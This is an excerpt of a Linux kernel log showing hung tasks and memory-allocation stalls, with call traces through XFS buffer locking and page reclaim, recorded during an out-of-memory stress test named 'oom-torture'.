[ 1201.237877]  [<ffffffffa0242915>] xfs_buf_get_map+0x25/0x160 [xfs]
[ 1201.242283]  [<ffffffffa0242ee9>] xfs_buf_read_map+0x29/0xe0 [xfs]
[ 1201.247024]  [<ffffffff810afc21>] ? enqueue_entity+0x1e1/0xba0
[ 1201.251190]  [<ffffffffa026d837>] xfs_trans_read_buf_map+0x97/0x1a0 [xfs]
[ 1201.255961]  [<ffffffffa020ad95>] xfs_read_agf+0x75/0xb0 [xfs]
[ 1201.260139]  [<ffffffffa020adf6>] xfs_alloc_read_agf+0x26/0xd0 [xfs]
[ 1201.264992]  [<ffffffffa020b1c5>] xfs_alloc_fix_freelist+0x325/0x3e0 [xfs]
[ 1201.269857]  [<ffffffffa0239752>] ? xfs_perag_get+0x82/0x110 [xfs]
[ 1201.274528]  [<ffffffff812dd76e>] ? __radix_tree_lookup+0x6e/0xd0
[ 1201.279040]  [<ffffffffa020b47e>] xfs_alloc_vextent+0x19e/0x480 [xfs]
[ 1201.284013]  [<ffffffffa02190cf>] xfs_bmap_btalloc+0x3bf/0x710 [xfs]
[ 1201.288578]  [<ffffffffa0219429>] xfs_bmap_alloc+0x9/0x10 [xfs]
[ 1201.292852]  [<ffffffffa0219e1a>] xfs_bmapi_write+0x47a/0xa10 [xfs]
[ 1201.297644]  [<ffffffffa024f3fd>] xfs_iomap_write_allocate+0x16d/0x350 [xfs]
[ 1201.302610]  [<ffffffffa023c4ed>] xfs_map_blocks+0x13d/0x150 [xfs]
[ 1201.307028]  [<ffffffffa023d468>] xfs_do_writepage+0x158/0x540 [xfs]
[ 1201.311537]  [<ffffffff81158326>] write_cache_pages+0x1f6/0x490
[ 1201.315770]  [<ffffffffa023d310>] ? xfs_aops_discard_page+0x140/0x140 [xfs]
[ 1201.322135]  [<ffffffff810c1a9b>] ? __lock_acquire+0x75b/0x1a30
[ 1201.326382]  [<ffffffffa023d136>] xfs_vm_writepages+0x66/0xa0 [xfs]
[ 1201.330841]  [<ffffffff811594ac>] do_writepages+0x1c/0x30
[ 1201.335292]  [<ffffffff8114bab1>] __filemap_fdatawrite_range+0xc1/0x100
[ 1201.339950]  [<ffffffff8114bbc8>] filemap_write_and_wait_range+0x28/0x60
[ 1201.344676]  [<ffffffffa02458f4>] xfs_file_fsync+0x44/0x180 [xfs]
[ 1201.349016]  [<ffffffff811ff2b8>] vfs_fsync_range+0x38/0xa0
[ 1201.353378]  [<ffffffff811eb68a>] ? __fget_light+0x6a/0x90
[ 1201.357354]  [<ffffffff811ff378>] do_fsync+0x38/0x60
[ 1201.360970]  [<ffffffff811ff5fb>] SyS_fsync+0xb/0x10
[ 1201.364887]  [<ffffffff81003642>] do_syscall_64+0x62/0x190
[ 1201.368873]  [<ffffffff816277ff>] entry_SYSCALL64_slow_path+0x25/0x25
[ 1201.373458] 2 locks held by oom-torture/4083:
[ 1201.377979]  #0:  (sb_internal){.+.+.?}, at: [<ffffffff811ce35c>] __sb_start_write+0xcc/0xe0
[ 1201.384627]  #1:  (&xfs_nondir_ilock_class){++++--}, at: [<ffffffffa0251caf>] xfs_ilock+0x7f/0xe0 [xfs]
[ 1201.392372] INFO: task oom-torture:4126 blocked for more than 120 seconds.
[ 1201.397186]       Not tainted 4.7.0-rc7+ #55
[ 1201.400361] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
[ 1201.405791] oom-torture     D ffff880019c5f428     0  4126   3652 0x00000080
[ 1201.413798]  ffff880019c5f428 ffff880019c58040 ffff88003fba4080 ffff880019c58040
[ 1201.419259]  ffff880019c60000 ffff880037de7070 ffff880019c58040 ffff880035d00000
[ 1201.425238]  0000000000000000 ffff880019c5f440 ffffffff81621dea 7fffffffffffffff
[ 1201.430688] Call Trace:
[ 1201.432768]  [<ffffffff81621dea>] schedule+0x3a/0x90
[ 1201.436438]  [<ffffffff816266df>] schedule_timeout+0x17f/0x1c0
[ 1201.440641]  [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90
[ 1201.444792]  [<ffffffff81626ea7>] ? _raw_spin_unlock_irq+0x27/0x60
[ 1201.449212]  [<ffffffff810c0ef9>] ? trace_hardirqs_on_caller+0xf9/0x1c0
[ 1201.453883]  [<ffffffff816253fb>] __down+0x71/0xb8
[ 1201.457442]  [<ffffffff81626c86>] ? _raw_spin_lock_irqsave+0x56/0x70
[ 1201.461940]  [<ffffffff810bcf1c>] down+0x3c/0x50
[ 1201.465364]  [<ffffffffa02425e1>] xfs_buf_lock+0x21/0x50 [xfs]
[ 1201.469653]  [<ffffffffa02427c5>] _xfs_buf_find+0x1b5/0x2e0 [xfs]
[ 1201.474029]  [<ffffffffa0242915>] xfs_buf_get_map+0x25/0x160 [xfs]
[ 1201.478766]  [<ffffffffa0242ee9>] xfs_buf_read_map+0x29/0xe0 [xfs]
[ 1201.483480]  [<ffffffffa026d837>] xfs_trans_read_buf_map+0x97/0x1a0 [xfs]
[ 1201.488382]  [<ffffffffa020ad95>] xfs_read_agf+0x75/0xb0 [xfs]
[ 1201.492630]  [<ffffffffa020adf6>] xfs_alloc_read_agf+0x26/0xd0 [xfs]
[ 1201.497546]  [<ffffffffa020b1c5>] xfs_alloc_fix_freelist+0x325/0x3e0 [xfs]
[ 1201.502408]  [<ffffffffa0239752>] ? xfs_perag_get+0x82/0x110 [xfs]
[ 1201.506862]  [<ffffffff812dd76e>] ? __radix_tree_lookup+0x6e/0xd0
[ 1201.511693]  [<ffffffffa020b47e>] xfs_alloc_vextent+0x19e/0x480 [xfs]
[ 1201.516961]  [<ffffffffa02190cf>] xfs_bmap_btalloc+0x3bf/0x710 [xfs]
[ 1201.522213]  [<ffffffffa0219429>] xfs_bmap_alloc+0x9/0x10 [xfs]
[ 1201.526631]  [<ffffffffa0219e1a>] xfs_bmapi_write+0x47a/0xa10 [xfs]
[ 1201.531094]  [<ffffffffa024f3fd>] xfs_iomap_write_allocate+0x16d/0x350 [xfs]
[ 1201.536384]  [<ffffffffa023c4ed>] xfs_map_blocks+0x13d/0x150 [xfs]
[ 1201.540818]  [<ffffffffa023d468>] xfs_do_writepage+0x158/0x540 [xfs]
[ 1201.545350]  [<ffffffff81158326>] write_cache_pages+0x1f6/0x490
[ 1201.549613]  [<ffffffffa023d310>] ? xfs_aops_discard_page+0x140/0x140 [xfs]
[ 1201.554525]  [<ffffffff810c1a9b>] ? __lock_acquire+0x75b/0x1a30
[ 1201.558776]  [<ffffffffa023d136>] xfs_vm_writepages+0x66/0xa0 [xfs]
[ 1201.563217]  [<ffffffff811594ac>] do_writepages+0x1c/0x30
[ 1201.567127]  [<ffffffff8114bab1>] __filemap_fdatawrite_range+0xc1/0x100
[ 1201.571792]  [<ffffffff8114bbc8>] filemap_write_and_wait_range+0x28/0x60
[ 1201.576518]  [<ffffffffa02458f4>] xfs_file_fsync+0x44/0x180 [xfs]
[ 1201.580860]  [<ffffffff811ff2b8>] vfs_fsync_range+0x38/0xa0
[ 1201.584875]  [<ffffffff811eb68a>] ? __fget_light+0x6a/0x90
[ 1201.588849]  [<ffffffff811ff378>] do_fsync+0x38/0x60
[ 1201.592486]  [<ffffffff811ff5fb>] SyS_fsync+0xb/0x10
[ 1201.596086]  [<ffffffff81003642>] do_syscall_64+0x62/0x190
[ 1201.600028]  [<ffffffff816277ff>] entry_SYSCALL64_slow_path+0x25/0x25
[ 1201.604598] 2 locks held by oom-torture/4126:
[ 1201.609179]  #0:  (sb_internal){.+.+.?}, at: [<ffffffff811ce35c>] __sb_start_write+0xcc/0xe0
[ 1201.618523]  #1:  (&xfs_nondir_ilock_class){++++--}, at: [<ffffffffa0251caf>] xfs_ilock+0x7f/0xe0 [xfs]
[ 1201.678895] MemAlloc-Info: stalling=112 dying=3 exiting=3 victim=0 oom_count=3275
[ 1201.698443] MemAlloc: systemd(1) flags=0x400900 switches=158149 seq=5087 gfp=0x242134a(GFP_NOFS|__GFP_HIGHMEM|__GFP_COLD|__GFP_NOWARN|__GFP_NORETRY|__GFP_HARDWALL|__GFP_MOVABLE) order=0 delay=81975 uninterruptible
[ 1201.735142] systemd         D ffff88003faef5b8     0     1      0 0x00000000
[ 1201.743813]  ffff88003faef5b8 00000001000dc1d3 ffff88002b3fc040 ffff88003fae8040
[ 1201.752998]  ffff88003faf0000 ffff88003faef5f0 ffff88003d650300 00000001000dc1d3
[ 1201.761073]  0000000000000002 ffff88003faef5d0 ffffffff81621dea ffff88003d650300
[ 1201.766466] Call Trace:
[ 1201.768534]  [<ffffffff81621dea>] schedule+0x3a/0x90
[ 1201.772339]  [<ffffffff8162667e>] schedule_timeout+0x11e/0x1c0
[ 1201.776623]  [<ffffffff810e4ba0>] ? init_timer_key+0x40/0x40
[ 1201.780802]  [<ffffffff8112f24a>] ? __delayacct_blkio_start+0x1a/0x30
[ 1201.785651]  [<ffffffff81621571>] io_schedule_timeout+0xa1/0x110
[ 1201.790259]  [<ffffffff8116ba5d>] congestion_wait+0x7d/0xd0
[ 1201.794385]  [<ffffffff810baaa0>] ? wait_woken+0x80/0x80
[ 1201.798338]  [<ffffffff811605e1>] shrink_inactive_list+0x441/0x490
[ 1201.803098]  [<ffffffff8100301a>] ? trace_hardirqs_on_thunk+0x1a/0x1c
[ 1201.807690]  [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740
[ 1201.811922]  [<ffffffff81161214>] shrink_zone+0xd4/0x2f0
[ 1201.815748]  [<ffffffff811617aa>] do_try_to_free_pages+0x17a/0x400
[ 1201.820144]  [<ffffffff81161ac4>] try_to_free_pages+0x94/0xc0
[ 1201.824254]  [<ffffffff81153c1c>] __alloc_pages_nodemask+0x69c/0xf70
[ 1201.829014]  [<ffffffff810c1a9b>] ? __lock_acquire+0x75b/0x1a30
[ 1201.833220]  [<ffffffff8119e8c6>] alloc_pages_current+0x96/0x1b0
[ 1201.837477]  [<ffffffff8114933d>] __page_cache_alloc+0x12d/0x160
[ 1201.841758]  [<ffffffff81159d6e>] __do_page_cache_readahead+0x10e/0x370
[ 1201.846403]  [<ffffffff81159dd0>] ? __do_page_cache_readahead+0x170/0x370
[ 1201.851167]  [<ffffffff81149cb7>] ? pagecache_get_page+0x27/0x260
[ 1201.855494]  [<ffffffff8114ce1b>] filemap_fault+0x31b/0x670
[ 1201.859509]  [<ffffffffa0251d00>] ? xfs_ilock+0xd0/0xe0 [xfs]
[ 1201.863631]  [<ffffffffa0245be9>] xfs_filemap_fault+0x39/0x60 [xfs]
[ 1201.868073]  [<ffffffff81176e71>] __do_fault+0x71/0x140
[ 1201.871866]  [<ffffffff8117d53c>] handle_mm_fault+0x12ec/0x1f30
[ 1201.876068]  [<ffffffff8105c865>] ? __do_page_fault+0x1b5/0x560
[ 1201.880291]  [<ffffffff8105c7b2>] ? __do_page_fault+0x102/0x560
[ 1201.884492]  [<ffffffff8105c840>] __do_page_fault+0x190/0x560
[ 1201.888952]  [<ffffffff8105cc40>] do_page_fault+0x30/0x80
[ 1201.893093]  [<ffffffff81629278>] page_fault+0x28/0x30
[ 1201.896840] MemAlloc: kswapd0(56) flags=0xa60840 switches=69433 uninterruptible
[ 1201.903736] kswapd0         D ffff880039fa7178     0    56      2 0x00000000
[ 1201.909494]  ffff880039fa7178 0000000000000006 ffffffff81c0d540 ffff880039fa0100
[ 1201.915008]  ffff880039fa8000 ffff880037de7070 ffff880039fa0100 ffff880035d00000
[ 1201.920524]  0000000000000000 ffff880039fa7190 ffffffff81621dea 7fffffffffffffff
[ 1201.925986] Call Trace:
[ 1201.928112]  [<ffffffff81621dea>] schedule+0x3a/0x90
[ 1201.931838]  [<ffffffff816266df>] schedule_timeout+0x17f/0x1c0
[ 1201.936074]  [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90
[ 1201.940535]  [<ffffffff81626ea7>] ? _raw_spin_unlock_irq+0x27/0x60
[ 1201.944987]  [<ffffffff810c0ef9>] ? trace_hardirqs_on_caller+0xf9/0x1c0
[ 1201.949644]  [<ffffffff816253fb>] __down+0x71/0xb8
[ 1201.953149]  [<ffffffff810bcf1c>] down+0x3c/0x50
[ 1201.956682]  [<ffffffffa02425e1>] xfs_buf_lock+0x21/0x50 [xfs]
[ 1201.960832]  [<ffffffffa02427c5>] _xfs_buf_find+0x1b5/0x2e0 [xfs]
[ 1201.965200]  [<ffffffffa0242915>] xfs_buf_get_map+0x25/0x160 [xfs]
[ 1201.969536]  [<ffffffffa0242ee9>] xfs_buf_read_map+0x29/0xe0 [xfs]
[ 1201.973892]  [<ffffffffa026d837>] xfs_trans_read_buf_map+0x97/0x1a0 [xfs]
[ 1201.978644]  [<ffffffffa020ad95>] xfs_read_agf+0x75/0xb0 [xfs]
[ 1201.982842]  [<ffffffffa020adf6>] xfs_alloc_read_agf+0x26/0xd0 [xfs]
[ 1201.987335]  [<ffffffffa020b1c5>] xfs_alloc_fix_freelist+0x325/0x3e0 [xfs]
[ 1201.992105]  [<ffffffffa0239752>] ? xfs_perag_get+0x82/0x110 [xfs]
[ 1201.996447]  [<ffffffff812dd76e>] ? __radix_tree_lookup+0x6e/0xd0
[ 1202.000745]  [<ffffffffa020b47e>] xfs_alloc_vextent+0x19e/0x480 [xfs]
[ 1202.005547]  [<ffffffffa02190cf>] xfs_bmap_btalloc+0x3bf/0x710 [xfs]
[ 1202.010018]  [<ffffffffa0219429>] xfs_bmap_alloc+0x9/0x10 [xfs]
[ 1202.014194]  [<ffffffffa0219e1a>] xfs_bmapi_write+0x47a/0xa10 [xfs]
[ 1202.018597]  [<ffffffffa024f3fd>] xfs_iomap_write_allocate+0x16d/0x350 [xfs]
[ 1202.023493]  [<ffffffffa023c4ed>] xfs_map_blocks+0x13d/0x150 [xfs]
[ 1202.028006]  [<ffffffffa023d468>] xfs_do_writepage+0x158/0x540 [xfs]
[ 1202.032475]  [<ffffffffa023d886>] xfs_vm_writepage+0x36/0x70 [xfs]
[ 1202.036809]  [<ffffffff8115e1df>] pageout.isra.43+0x18f/0x240
[ 1202.040867]  [<ffffffff8115fa85>] shrink_page_list+0x725/0x950
[ 1202.045348]  [<ffffffff811603a5>] shrink_inactive_list+0x205/0x490
[ 1202.049708]  [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740
[ 1202.053893]  [<ffffffff81161214>] shrink_zone+0xd4/0x2f0
[ 1202.057714]  [<ffffffff81162165>] kswapd+0x445/0x830
[ 1202.061317]  [<ffffffff81161d20>] ? mem_cgroup_shrink_node_zone+0xb0/0xb0
[ 1202.066285]  [<ffffffff81094d6e>] kthread+0xee/0x110
[ 1202.069865]  [<ffffffff8162796f>] ret_from_fork+0x1f/0x40
[ 1202.074064]  [<ffffffff81094c80>] ? kthread_create_on_node+0x230/0x230
(...snipped...)
[ 1208.254571] MemAlloc: kworker/2:1(4484) flags=0x4208860 switches=41309 seq=15 gfp=0x2400000(GFP_NOIO) order=0 delay=90419 uninterruptible
[ 1208.254573] kworker/2:1     D ffff88002d50b548     0  4484      2 0x00000080
[ 1208.254588] Workqueue: events_freezable_power_ disk_events_workfn
[ 1208.254589]  ffff88002d50b548 00000001000ddb5a ffff88003fb60080 ffff88002d5040c0
[ 1208.254591]  ffff88002d50c000 ffff88002d50b580 ffff88003d690300 00000001000ddb5a
[ 1208.254592]  0000000000000002 ffff88002d50b560 ffffffff81621dea ffff88003d690300
[ 1208.254592] Call Trace:
[ 1208.254594]  [<ffffffff81621dea>] schedule+0x3a/0x90
[ 1208.254595]  [<ffffffff8162667e>] schedule_timeout+0x11e/0x1c0
[ 1208.254596]  [<ffffffff810e4ba0>] ? init_timer_key+0x40/0x40
[ 1208.254597]  [<ffffffff8112f24a>] ? __delayacct_blkio_start+0x1a/0x30
[ 1208.254598]  [<ffffffff81621571>] io_schedule_timeout+0xa1/0x110
[ 1208.254600]  [<ffffffff8116ba5d>] congestion_wait+0x7d/0xd0
[ 1208.254601]  [<ffffffff810baaa0>] ? wait_woken+0x80/0x80
[ 1208.254602]  [<ffffffff811605e1>] shrink_inactive_list+0x441/0x490
[ 1208.254604]  [<ffffffff81174355>] ? __list_lru_count_one.isra.4+0x45/0x80
[ 1208.254605]  [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740
[ 1208.254606]  [<ffffffff81161214>] shrink_zone+0xd4/0x2f0
[ 1208.254607]  [<ffffffff811617aa>] do_try_to_free_pages+0x17a/0x400
[ 1208.254608]  [<ffffffff81161ac4>] try_to_free_pages+0x94/0xc0
[ 1208.254609]  [<ffffffff81153c1c>] __alloc_pages_nodemask+0x69c/0xf70
[ 1208.254610]  [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90
[ 1208.254613]  [<ffffffff811a6029>] ? kmem_cache_alloc_node+0x99/0x1d0
[ 1208.254614]  [<ffffffff8119e8c6>] alloc_pages_current+0x96/0x1b0
[ 1208.254617]  [<ffffffff812a3b2d>] ? bio_alloc_bioset+0x20d/0x2d0
[ 1208.254618]  [<ffffffff812a4f14>] bio_copy_kern+0xc4/0x180
[ 1208.254619]  [<ffffffff812aff00>] blk_rq_map_kern+0x70/0x130
[ 1208.272701]  [<ffffffff8140f2ad>] scsi_execute+0x12d/0x160
[ 1208.272734]  [<ffffffff8140f3d4>] scsi_execute_req_flags+0x84/0xf0
[ 1208.272738]  [<ffffffffa01e0762>] sr_check_events+0xb2/0x2a0 [sr_mod]
[ 1208.272742]  [<ffffffffa01d4163>] cdrom_check_events+0x13/0x30 [cdrom]
[ 1208.272743]  [<ffffffffa01e0ba5>] sr_block_check_events+0x25/0x30 [sr_mod]
[ 1208.272747]  [<ffffffff812bb6db>] disk_check_events+0x5b/0x150
[ 1208.272749]  [<ffffffff812bb7e7>] disk_events_workfn+0x17/0x20
[ 1208.272752]  [<ffffffff8108e2f5>] process_one_work+0x1a5/0x400
[ 1208.272753]  [<ffffffff8108e291>] ? process_one_work+0x141/0x400
[ 1208.272755]  [<ffffffff8108e676>] worker_thread+0x126/0x490
[ 1208.272756]  [<ffffffff8108e550>] ? process_one_work+0x400/0x400
[ 1208.272758]  [<ffffffff81094d6e>] kthread+0xee/0x110
[ 1208.272761]  [<ffffffff8162796f>] ret_from_fork+0x1f/0x40
[ 1208.272762]  [<ffffffff81094c80>] ? kthread_create_on_node+0x230/0x230
[ 1208.272858] Mem-Info:
[ 1208.272864] active_anon:197951 inactive_anon:2919 isolated_anon:0
[ 1208.272864]  active_file:497 inactive_file:551 isolated_file:23
[ 1208.272864]  unevictable:0 dirty:0 writeback:204 unstable:0
[ 1208.272864]  slab_reclaimable:1715 slab_unreclaimable:10861
[ 1208.272864]  mapped:696 shmem:3239 pagetables:5438 bounce:0
[ 1208.272864]  free:12363 free_pcp:219 free_cma:0
[ 1208.272869] Node 0 DMA free:4476kB min:732kB low:912kB high:1092kB active_anon:8600kB inactive_anon:0kB active_file:12kB inactive_file:20kB unevictable:0kB isolated(anon):0kB isolated(file):92kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:28kB mapped:12kB shmem:8kB slab_reclaimable:148kB slab_unreclaimable:756kB kernel_stack:432kB pagetables:524kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[ 1208.272870] lowmem_reserve[]: 0 936 936 936
[ 1208.272874] Node 0 DMA32 free:44976kB min:44320kB low:55400kB high:66480kB active_anon:783204kB inactive_anon:11676kB active_file:1976kB inactive_file:2184kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:1032064kB managed:981068kB mlocked:0kB dirty:0kB writeback:788kB mapped:2772kB shmem:12948kB slab_reclaimable:6712kB slab_unreclaimable:42688kB kernel_stack:20384kB pagetables:21228kB unstable:0kB bounce:0kB free_pcp:876kB local_pcp:104kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[ 1208.272875] lowmem_reserve[]: 0 0 0 0
[ 1208.272883] Node 0 DMA: 37*4kB (U) 27*8kB (UM) 13*16kB (UM) 10*32kB (U) 2*64kB (UM) 3*128kB (UM) 4*256kB (UM) 2*512kB (UM) 1*1024kB (U) 0*2048kB 0*4096kB = 4476kB
[ 1208.272888] Node 0 DMA32: 1420*4kB (UME) 1010*8kB (UME) 661*16kB (UME) 323*32kB (UME) 117*64kB (UME) 22*128kB (UME) 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 44976kB
[ 1208.272890] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB
[ 1208.272892] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[ 1208.272893] 4329 total pagecache pages
[ 1208.272894] 0 pages in swap cache
[ 1208.272895] Swap cache stats: add 0, delete 0, find 0/0
[ 1208.272895] Free swap  = 0kB
[ 1208.272895] Total swap = 0kB
[ 1208.272897] 262013 pages RAM
[ 1208.272897] 0 pages HighMem/MovableOnly
[ 1208.272898] 12770 pages reserved
[ 1208.272898] 0 pages cma reserved
[ 1208.272898] 0 pages hwpoisoned
[ 1208.272899] Showing busy workqueues and worker pools:
[ 1208.272972] workqueue events_power_efficient: flags=0x80
[ 1208.273012]   pwq 0: cpus=0 node=0 flags=0x0 nice=0 active=1/256
[ 1208.273018]     in-flight: 4340:fb_flashcursor
[ 1208.273030] workqueue events_freezable_power_: flags=0x84
[ 1208.273058]   pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256
[ 1208.273063]     in-flight: 4484:disk_events_workfn
[ 1208.273104] workqueue writeback: flags=0x4e
[ 1208.273106]   pwq 128: cpus=0-63 flags=0x4 nice=0 active=2/256
[ 1208.273111]     in-flight: 73:wb_workfn wb_workfn
[ 1208.306156] workqueue xfs-eofblocks/sda1: flags=0xc
[ 1208.306191]   pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256
[ 1208.306211]     in-flight: 2125:xfs_eofblocks_worker [xfs]
[ 1208.306229] pool 0: cpus=0 node=0 flags=0x0 nice=0 hung=0s workers=13 idle: 4426 2410 4325 4483 4437 4723 4326 2389 4721 4435 4720 2498
[ 1208.306236] pool 4: cpus=2 node=0 flags=0x0 nice=0 hung=0s workers=13 idle: 1882 2396 2156 4427 2483 2293 4718 4646 2516 4722 4719
[ 1208.306302] pool 128: cpus=0-63 flags=0x4 nice=0 hung=0s workers=3 idle: 4706 6
(...snipped...)
[ 1208.311522] MemAlloc-Info: stalling=112 dying=3 exiting=3 victim=0 oom_count=3275
(...snipped...)
[ 1950.054919] MemAlloc-Info: stalling=114 dying=3 exiting=3 victim=0 oom_count=3275
[ 1950.078012] MemAlloc: systemd(1) flags=0x400900 switches=165614 seq=5087 gfp=0x242134a(GFP_NOFS|__GFP_HIGHMEM|__GFP_COLD|__GFP_NOWARN|__GFP_NORETRY|__GFP_HARDWALL|__GFP_MOVABLE) order=0 delay=830398 uninterruptible
[ 1950.111605] systemd         R  running task        0     1      0 0x00000000
[ 1950.122076]  ffff88003faef5b8 0000000100192d5b ffff88003a544100 ffff88003fae8040
[ 1950.128056]  ffff88003faf0000 ffff88003faef5f0 ffff88003d6d0300 0000000100192d5b
[ 1950.133668]  0000000000000002 ffff88003faef5d0 ffffffff81621dea ffff88003d6d0300
[ 1950.139115] Call Trace:
[ 1950.141436]  [<ffffffff81621dea>] schedule+0x3a/0x90
[ 1950.145228]  [<ffffffff8162667e>] schedule_timeout+0x11e/0x1c0
[ 1950.149574]  [<ffffffff810e4ba0>] ? init_timer_key+0x40/0x40
[ 1950.153772]  [<ffffffff8112f24a>] ? __delayacct_blkio_start+0x1a/0x30
[ 1950.158432]  [<ffffffff81621571>] io_schedule_timeout+0xa1/0x110
[ 1950.162841]  [<ffffffff8116ba5d>] congestion_wait+0x7d/0xd0
[ 1950.166950]  [<ffffffff810baaa0>] ? wait_woken+0x80/0x80
[ 1950.170994]  [<ffffffff811605e1>] shrink_inactive_list+0x441/0x490
[ 1950.175841]  [<ffffffff8100301a>] ? trace_hardirqs_on_thunk+0x1a/0x1c
[ 1950.180556]  [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740
[ 1950.185904]  [<ffffffff81161214>] shrink_zone+0xd4/0x2f0
[ 1950.190358]  [<ffffffff811617aa>] do_try_to_free_pages+0x17a/0x400
[ 1950.194978]  [<ffffffff81161ac4>] try_to_free_pages+0x94/0xc0
[ 1950.201233]  [<ffffffff81153c1c>] __alloc_pages_nodemask+0x69c/0xf70
[ 1950.206097]  [<ffffffff810c1a9b>] ? __lock_acquire+0x75b/0x1a30
[ 1950.210494]  [<ffffffff8119e8c6>] alloc_pages_current+0x96/0x1b0
[ 1950.215278]  [<ffffffff8114933d>] __page_cache_alloc+0x12d/0x160
[ 1950.219628]  [<ffffffff81159d6e>] __do_page_cache_readahead+0x10e/0x370
[ 1950.224302]  [<ffffffff81159dd0>] ? __do_page_cache_readahead+0x170/0x370
[ 1950.229148]  [<ffffffff81149cb7>] ? pagecache_get_page+0x27/0x260
[ 1950.233503]  [<ffffffff8114ce1b>] filemap_fault+0x31b/0x670
[ 1950.237520]  [<ffffffffa0251d00>] ? xfs_ilock+0xd0/0xe0 [xfs]
[ 1950.241643]  [<ffffffffa0245be9>] xfs_filemap_fault+0x39/0x60 [xfs]
[ 1950.246027]  [<ffffffff81176e71>] __do_fault+0x71/0x140
[ 1950.249784]  [<ffffffff8117d53c>] handle_mm_fault+0x12ec/0x1f30
[ 1950.253974]  [<ffffffff8105c865>] ? __do_page_fault+0x1b5/0x560
[ 1950.259159]  [<ffffffff8105c7b2>] ? __do_page_fault+0x102/0x560
[ 1950.264641]  [<ffffffff8105c840>] __do_page_fault+0x190/0x560
[ 1950.269192]  [<ffffffff8105cc40>] do_page_fault+0x30/0x80
[ 1950.273736]  [<ffffffff81629278>] page_fault+0x28/0x30
[ 1950.278475] MemAlloc: khugepaged(47) flags=0x200840 switches=8965 seq=9 gfp=0xc752ca(GFP_TRANSHUGE|__GFP_THISNODE|__GFP_DIRECT_RECLAIM|__GFP_OTHER_NODE) order=9 delay=762178 uninterruptible
[ 1950.291797] khugepaged      D ffff88003cf537a8     0    47      2 0x00000000
[ 1950.298253]  ffff88003cf537a8 0000000100192dbf ffff88003fae8040 ffff88003cf3c000
[ 1950.304204]  ffff88003cf54000 ffff88003cf537e0 ffff88003d6d0300 0000000100192dbf
[ 1950.310046]  0000000000000002 ffff88003cf537c0 ffffffff81621dea ffff88003d6d0300
[ 1950.317795] Call Trace:
[ 1950.320089]  [<ffffffff81621dea>] schedule+0x3a/0x90
[ 1950.324003]  [<ffffffff8162667e>] schedule_timeout+0x11e/0x1c0
[ 1950.328400]  [<ffffffff810e4ba0>] ? init_timer_key+0x40/0x40
[ 1950.332449]  [<ffffffff8112f24a>] ? __delayacct_blkio_start+0x1a/0x30
[ 1950.337038]  [<ffffffff81621571>] io_schedule_timeout+0xa1/0x110
[ 1950.341332]  [<ffffffff8116ba5d>] congestion_wait+0x7d/0xd0
[ 1950.345834]  [<ffffffff810baaa0>] ? wait_woken+0x80/0x80
[ 1950.351326]  [<ffffffff811605e1>] shrink_inactive_list+0x441/0x490
[ 1950.355756]  [<ffffffff81174355>] ? __list_lru_count_one.isra.4+0x45/0x80
[ 1950.360660]  [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740
[ 1950.366724]  [<ffffffff81161214>] shrink_zone+0xd4/0x2f0
[ 1950.370594]  [<ffffffff811617aa>] do_try_to_free_pages+0x17a/0x400
[ 1950.374968]  [<ffffffff81161ac4>] try_to_free_pages+0x94/0xc0
[ 1950.379637]  [<ffffffff81153c1c>] __alloc_pages_nodemask+0x69c/0xf70
[ 1950.384061]  [<ffffffff810ba578>] ? remove_wait_queue+0x48/0x50
[ 1950.388185]  [<ffffffff811af13e>] khugepaged+0x80e/0x1510
[ 1950.392291]  [<ffffffff810baaa0>] ? wait_woken+0x80/0x80
[ 1950.396425]  [<ffffffff811ae930>] ? vmf_insert_pfn_pmd+0x1b0/0x1b0
[ 1950.400908]  [<ffffffff81094d6e>] kthread+0xee/0x110
[ 1950.404637]  [<ffffffff8162796f>] ret_from_fork+0x1f/0x40
[ 1950.408407]  [<ffffffff81094c80>] ? kthread_create_on_node+0x230/0x230
[ 1950.412879] MemAlloc: kswapd0(56) flags=0xa60840 switches=69433 uninterruptible
[ 1950.419403] kswapd0         D ffff880039fa7178     0    56      2 0x00000000
[ 1950.424425]  ffff880039fa7178 0000000000000006 ffffffff81c0d540 ffff880039fa0100
[ 1950.430782]  ffff880039fa8000 ffff880037de7070 ffff880039fa0100 ffff880035d00000
[ 1950.436007]  0000000000000000 ffff880039fa7190 ffffffff81621dea 7fffffffffffffff
[ 1950.441198] Call Trace:
[ 1950.443203]  [<ffffffff81621dea>] schedule+0x3a/0x90
[ 1950.447880]  [<ffffffff816266df>] schedule_timeout+0x17f/0x1c0
[ 1950.452830]  [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90
[ 1950.456988]  [<ffffffff81626ea7>] ? _raw_spin_unlock_irq+0x27/0x60
[ 1950.461570]  [<ffffffff810c0ef9>] ? trace_hardirqs_on_caller+0xf9/0x1c0
[ 1950.466355]  [<ffffffff816253fb>] __down+0x71/0xb8
[ 1950.469801]  [<ffffffff810bcf1c>] down+0x3c/0x50
[ 1950.473158]  [<ffffffffa02425e1>] xfs_buf_lock+0x21/0x50 [xfs]
[ 1950.477591]  [<ffffffffa02427c5>] _xfs_buf_find+0x1b5/0x2e0 [xfs]
[ 1950.482185]  [<ffffffffa0242915>] xfs_buf_get_map+0x25/0x160 [xfs]
[ 1950.486506]  [<ffffffffa0242ee9>] xfs_buf_read_map+0x29/0xe0 [xfs]
[ 1950.490796]  [<ffffffffa026d837>] xfs_trans_read_buf_map+0x97/0x1a0 [xfs]
